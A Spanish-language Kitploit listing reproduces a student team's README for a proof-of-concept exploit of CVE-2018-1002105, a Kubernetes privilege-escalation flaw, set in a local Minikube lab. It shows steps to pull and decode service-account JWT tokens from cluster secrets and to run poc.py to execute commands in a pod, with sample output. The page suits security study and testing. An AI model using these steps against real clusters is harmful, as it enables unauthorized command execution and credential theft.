Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-1002105 — Exploit de prueba de concepto para CVE-2018-1002105, una vulnerabilidad de escalada de privilegios en Kubernetes que permite la ejecución no autorizada de comandos en pods a través del kube-apiserver. | Kitploit
Herramientas/GitHubGitHub/sh-ubh/cve-2018-1002105
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la Nube
GitHubsh-ubh/cve-2018-1002105

CVE-2018-1002105

Exploit de prueba de concepto para CVE-2018-1002105, una vulnerabilidad de escalada de privilegios en Kubernetes que permite la ejecución no autorizada de comandos en pods a través del kube-apiserver.

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CMPT733-Group11(0x90)

CVE-2018-1002105

Miembros: Abhishek Rungta, Shubham Saini, Siddhant Sood

Configuración del Entorno

  • Una máquina virtual Linux (como Ubuntu 20.04)
  • Minikube para el despliegue local de Kubernetes
  • Cualquiera de estas versiones antiguas (1.0.x— 1.9.x, 1.10.0—1.10.10, 1.11.0—1.11.4, 1.12.0—1.12.2)

Ejecutar el exploit

Hemos proporcionado una imagen de VirtualBox (archivo .ova). Descárgala y crea una máquina virtual a partir de ella. La ova proporcionada está preconfigurada con Docker v18.09 y Minikube v1.9.0.

Enlace OVA

Construir el clúster de Kubernetes

Como nuestra imagen virtual ya tiene Minikube y las versiones requeridas de Kubernetes, solo ejecuta el siguiente comando para iniciar Minikube.

root@kitploit:~
minikube start --kubernetes-version=v1.12.2

Crear nuevo usuario, namespace y asignar rol

Crea un nuevo usuario y un namespace y asigna un rol RBAC al usuario creado usando el siguiente comando.

root@kitploit:~
kubectl apply -f fixing_policy.yml

Eliminar acceso a conntract

root@kitploit:~
kubectl edit configmaps kube-proxy --namespace=kube-system

Cambia el valor de maxPerCore a 0.

Obtener el token JWT

Primero ejecuta el siguiente comando para obtener todos los tokens JWT almacenados en el sistema.

root@kitploit:~
kubectl get secrets -A

Para obtener el secreto del usuario específico creado, ejecuta el siguiente comando:

root@kitploit:~
kubectl -n [namespace] get secrets [user-token] -o json

Luego decodifícalo en base64.

root@kitploit:~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

Obtener la dirección IP y el puerto

root@kitploit:~
kubectl cluster-info

Desplegar el pod

root@kitploit:~
kubectl run --image=nginx:alpine securenginx -n poc

Ejecutar el POC

Especifica todos los argumentos requeridos:
-t para el objetivo> ip:puerto (requerido)
-j para el token JWT del usuario (requerido)
-p para el pod (requerido)
-n para el namespace
-m para el método (requerido)
-c para el contenedor
-x para el comando del atacante

Caso de prueba

Entrada

root@kitploit:~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
root@kitploit:~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

Salida

root@kitploit:~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

Demostración en video

Video de demostración enlace

Descargar herramienta